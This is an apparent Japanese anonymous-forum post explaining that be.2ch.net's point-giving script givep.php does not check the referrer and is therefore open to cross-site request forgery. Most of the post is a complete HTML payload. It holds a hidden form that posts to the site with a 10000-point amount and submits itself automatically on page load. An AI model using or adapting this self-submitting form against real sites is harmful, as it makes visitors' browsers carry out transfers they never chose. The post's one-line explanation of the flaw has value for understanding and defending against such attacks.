10/11/14 01:48:08 lANXd+bO0
>>569
ポイントをあげるためのgivep.phpがリファラーをチェックしないという欠陥を抱えているため、
CSRFが可能な状態になっていた
簡単にまとめるとこういうこと
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=EUC-JP">
</head>
<body onLoad="document.forms[0].submit.click();">
<form action="URLリンク(be.2ch.net)" method="post">
<input name="message" value="メッセージ" type="hidden">
<input name="i" value="******" type="hidden">
<input name="d" value="d:" type="hidden">
<input name="submit" value="送付" type="submit">
<input name="hid" value="1" type="hidden">
<input name="amount" value="10000"type="hidden"></form>
</body>
</html>